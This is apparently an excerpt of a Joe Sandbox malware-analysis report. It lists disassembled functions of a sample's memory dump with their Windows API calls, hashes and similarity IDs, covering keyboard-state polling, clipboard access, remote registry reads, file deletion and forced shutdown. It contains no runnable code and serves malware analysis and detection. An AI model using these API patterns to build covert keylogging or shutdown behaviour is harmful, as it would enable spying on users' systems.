                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                  • Opcode ID: 5621c5d8adcc5004e6f94ffe84757dab7de8385c30c00a4b50d76555dec4a95e
                                                                                                                                                                                                                                  • Instruction ID: 7c5ef9bfcccb266a6ba13efc72ebbd07a8e96fc04fb18453f0d17cba029051d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5621c5d8adcc5004e6f94ffe84757dab7de8385c30c00a4b50d76555dec4a95e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA31D53150071DBBDB20EFB4EC49AEE73ACAF54321F100665F815E20D1EB70DA868B65
                                                                                                                                                                                                                                  Function 00A04763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A04785
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A047B2
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A047E2
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A04803
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00A04813
                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A0489A
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A048A5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A048B0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                                                                                                  • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                  • Opcode ID: af8c42b7bd5d589bd91d61500eb1fe36b689452b40b9fe0b34b542cfe3414afd
                                                                                                                                                                                                                                  • Instruction ID: 1397c8468ee17611693679d0cdae76284a57f4791dea1e4f8bf354a89e78289f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af8c42b7bd5d589bd91d61500eb1fe36b689452b40b9fe0b34b542cfe3414afd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB31AFB1900249ABDB21DBA4EC49FEB37BCFF89710F1085B6F609D60A1E77096458B64
                                                                                                                                                                                                                                  Function 00A0A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A0A203
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00A0A25E
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A0A269
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00A0A285
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A0A2D5
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00A57B94), ref: 00A0A2F3
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A0A2FD
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A0A30A
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00A0A31A
                                                                                                                                                                                                                                    • Part of subcall function 009FE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009FE3B4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                  • Opcode ID: 3bb8d2425e35cd1d1bf8c96c17d5d386233999808381ff1f25378ed57bcbdd4a
                                                                                                                                                                                                                                  • Instruction ID: 681a4993b6724a2b3cfbe68018af367b3e28afebd2a57da7417cba09dcf0f143
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bb8d2425e35cd1d1bf8c96c17d5d386233999808381ff1f25378ed57bcbdd4a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A31D27150071D6ECB20EBA4FC09AEE77ACAF59325F104171E811A20E1EB71DA868A52
                                                                                                                                                                                                                                  Function 00A1C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C99E
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00A1CA09
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1CA2D
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A1CA8C
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A1CB47
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A1CBB4
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A1CC49
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00A1CC9A
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A1CD43
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A1CDE2
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1CDEF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3102970594-0
                                                                                                                                                                                                                                  • Opcode ID: b6fdc315e97e8fd83b309ed62a8f52100dda058868a732b8e1904c58404e3be3
                                                                                                                                                                                                                                  • Instruction ID: a72e6702d15e6aa16d767ca737ec28754c68812c473bf32d9f0cf2aa8acf927a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6fdc315e97e8fd83b309ed62a8f52100dda058868a732b8e1904c58404e3be3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63023171604200AFD715DF28C895F6ABBE5EF89314F1884ADF44ACB2A2DB31ED46CB51
                                                                                                                                                                                                                                  Function 009FA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009FA65D
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 009FA6DE
                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 009FA6F9
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 009FA713
                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 009FA728
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009FA740
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 009FA752
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009FA76A
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 009FA77C
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 009FA794
                                                                                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 009FA7A6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                                                                                  • Opcode ID: f02db7315a3df1a752305efb5041b22c95b8750cde8efbd51a627fd7415a0b63
                                                                                                                                                                                                                                  • Instruction ID: 36f3e054670a5ae47559c44b461c1768be04dbfb3e4d40a27f26a0cc43d3d77f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f02db7315a3df1a752305efb5041b22c95b8750cde8efbd51a627fd7415a0b63
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41A6E49047CD6DFF31A76488047B5BEB86F15354F088059D7CA8A6C2EB949DC8C7A3
                                                                                                                                                                                                                                  Function 009FD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
                                                                                                                                                                                                                                    • Part of subcall function 009FEAB0: GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009FD9CD
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 009FDA88
                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009FDA9B
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 009FDAB8
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 009FDAE2
                                                                                                                                                                                                                                    • Part of subcall function 009FDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,009FDAC7,?,?), ref: 009FDB5D
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 009FDAFE
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009FDB0F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                  • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                  • Opcode ID: 563d9929a130949c2d3f0171134d108a4df8ea82ce5fd2cc4192f32d28dde7dd
                                                                                                                                                                                                                                  • Instruction ID: 37e7fb2ca8e958cb0893fe292c64f589c8e05f011a2bccd128f39f5d46556256
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 563d9929a130949c2d3f0171134d108a4df8ea82ce5fd2cc4192f32d28dde7dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33615E7180610DAECF15EBE4DA92AFDB7B9AF54301F2040A5E50577192EB359F0ACB60
                                                                                                                                                                                                                                  Function 00A0F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                                                                                                                  • Opcode ID: 54423984b4498277686998d12d38d23d4c2add64c16e6820537e8b8b1d4184ab
                                                                                                                                                                                                                                  • Instruction ID: d9b77e48051cd21362b02ca441d115f21dc26eb4939250e04a671ff7b772c4db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54423984b4498277686998d12d38d23d4c2add64c16e6820537e8b8b1d4184ab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72419C30604605EFD720CF59E888F65BBE4EF44318F14C0A8E8199FAA2CB35EC46CB90
                                                                                                                                                                                                                                  Function 009FF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009F205A
                                                                                                                                                                                                                                    • Part of subcall function 009F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009F2087
                                                                                                                                                                                                                                    • Part of subcall function 009F2010: GetLastError.KERNEL32 ref: 009F2097
                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 009FF249
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                  • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                  • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                  • Opcode ID: bdb1d65448d962d5879e19ce03152304450c90ae1726a8be5fb7673c4d11f29c
                                                                                                                                                                                                                                  • Instruction ID: 7d1932522b7c1ef3cad46bcac52357f2837d58188e08432181cb0d095b20dc15
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdb1d65448d962d5879e19ce03152304450c90ae1726a8be5fb7673c4d11f29c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC01DB766102186BEB2462BC5C99FFE725C9F04354F150931FF23E21D2D6644D059390
                                                                                                                                                                                                                                  Function 009CBCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CBD54
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CBD78
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CBEFF
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A346D0), ref: 009CBF11
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00A6221C,000000FF,00000000,0000003F,00000000,?,?), ref: 009CBF89
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00A62270,000000FF,?,0000003F,00000000,?), ref: 009CBFB6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CC0CB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 314583886-0
                                                                                                                                                                                                                                  • Opcode ID: 1a457bc876b1e1b00f53586fe247186fde5a8c991a95c71f6b398a4b89b52767
                                                                                                                                                                                                                                  • Instruction ID: 84b2e132013df11613e709c0674ddca85ca6311a0c71e8eae9027c92e6d395c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a457bc876b1e1b00f53586fe247186fde5a8c991a95c71f6b398a4b89b52767
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81C11871D002049BDB20EF78DC52FEA7BBCEF85720F1445AEE5559B291E7309E428B92
                                                                                                                                                                                                                                  Function 00A03A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009D56C2,?,?,00000000,00000000), ref: 00A03A1E
                                                                                                                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009D56C2,?,?,00000000,00000000), ref: 00A03A35
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE), ref: 00A03A45
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE), ref: 00A03A56
                                                                                                                                                                                                                                  • LockResource.KERNEL32(009D56C2,?,?,009D56C2,?,?,00000000,00000000,?,?,?,?,?,?,009966CE,?), ref: 00A03A65
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                  • String ID: SCRIPT
                                                                                                                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                  • Opcode ID: a4baf11ece2cc249ab5ce2cfed1e6fa1a6c98e139d119cc3cf1388b8dad2c74e
                                                                                                                                                                                                                                  • Instruction ID: 8b0a73bdd408454ce0610bad8766254492f0418929dd78ddc6c9ffe6f677009c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4baf11ece2cc249ab5ce2cfed1e6fa1a6c98e139d119cc3cf1388b8dad2c74e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F113C71200705BFEB318B69EC48F677BBDEBC5B91F14466CB54296190DBB2D9028660
                                                                                                                                                                                                                                  Function 009F20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009F1916
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009F1922
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009F1931
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009F1938
                                                                                                                                                                                                                                    • Part of subcall function 009F1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009F194E
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,009F1C81), ref: 009F20FB
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009F2107
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009F210E
                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 009F2127
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,009F1C81), ref: 009F213B
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F2142
